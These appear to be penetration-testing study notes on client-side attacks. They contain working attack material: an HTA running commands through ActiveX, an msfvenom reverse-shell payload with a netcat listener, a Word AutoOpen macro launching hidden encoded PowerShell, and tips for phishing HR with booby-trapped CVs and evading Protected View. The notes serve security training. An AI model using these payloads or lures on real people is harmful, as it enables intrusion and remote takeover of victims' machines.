Client-Side Attacks

• Attack vector is Client Software
• e.g.: browsers, email clients, office suite etc.
• this type of attack is very appealing to an attacker because it does not require direct access to the victim's machine

If given the choice, try to target Software which the victim uses every day in their line of work and trusts

Know Your Target

• Enumerate what Software and operating system is present on the target

Passive Client Information Gathering

• Same as in Passive Information Gathering]
  • Google hacking
  • Chat logs
  • Pictures on Social Media

Active Client Information Gathering

• Same as in Active Information Gathering
  • Phone calls
  • Phishing to get
    • OS version
    • Browser version (user agent)
    • Plugins installed

Social Engineering and Client-Side Attacks

• e.g.: (This example is very oversimplified)
  • Send a purposely corrupt word file as our CV to HR
  • They'll come back and tell us that it doesn't work
  • We offer our "help" and ask for the exact OS and Word version used to "fix" the problem
  • We figure out that the office version their using allows Marcos, so we send a new "CV" with a malicious marco with a reverse shell

Client Fingerprinting

• Goal: Make the victim visit our site to harvest what browser their using
• You can build your own or use pre-built fingerprinting frameworks
  • cd /var/www/html
  • sudo wget https://github.com/Valve/fingerprintjs2/archive/master.zip
  • sudo unzip master.zip
  • sudo mv fingerprintjs2-master/ fp
  • sudo chown www-data:www-data /var/www/html/fp
  • visit http://<your-kali-ip>/fp/fingerprint3server.html
  • cat /var/www/html/fp/fingerprint.txt

Leveraging HTML Applications

• If Internet Explorer receives a .hta file from a server instead of html, IE will open the hta file with mshta.exe which allows us to execute arbitrary JS or VBScript code with the user's permission

• Edge no longer support this, but its still worth a try

Exploring HTML Applications

• allows us to use legacy and often dangerous features
• e.g.: ActiveX Objects which can allow us access to system commands

  • Windows Script Host Shell:

    <html>
    <head>
    
    <script>
    
      var c= 'cmd.exe'
      new ActiveXObject('WScript.Shell').Run(c);
      
    </script>
    
    </head>
    <body>
    
    <script>
      
      self.close();
        
    </script>
      
    </body>
    </html>
    

HTA Attack in Action

• Same as before but this time using PowerShell
• Create a reverse shell payload: sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
• Create a Listener: nc -nlvp 4444
• Visit the page and allow the 2 security warnings

Exploiting Microsoft Office

Microsoft Word Macro

• Write Scripts with VBA

• Only works with .docm or .doc format as they support embedded macros (.docx does NOT!)

• VBA has a 255 character limit for literal strings (Does BOT apply to variables!)

• can be found/created under: View -> Macros in Word

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    
    Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
    Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
    Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A"
    Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg"
    Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY"
    Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"
    ...
    Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"
    Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB"
    Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA"
    Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
    Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
    Str = Str + "QA="

    CreateObject("Wscript.Shell").Run Str
End Sub

• AutoOpen(): When the document is first opened
• Document_Open(): When the document is reopened

Object Linking and Embedding

• OLE is designed to embed documents

• Batch Scripts (.bat) are now legacy but they are still fully supported by Windows

  • Batch scripts can also invoke PowerShell!

• If we create a .bat file, we can embed it into a Word file if we click the object button under the form the Insert ribbon, inside the "Text" section and use the "Create from File" option.

  • Here we can also set the "Display as icon" to make it look less suspicious and even change the caption

Evading Protected View

• When served from the internet (for example via an email or downloaded from a link) Office adds the so-called "Protected View" which is a sandbox and stops our macros or embedded objects

• A user could be tricked into "Enable Edit" but this is unlikely

• If you however know that a user uses Microsoft Publisher, you're in luck, as Publisher does not have Protected View

Relevant Note(s): Penetration Testing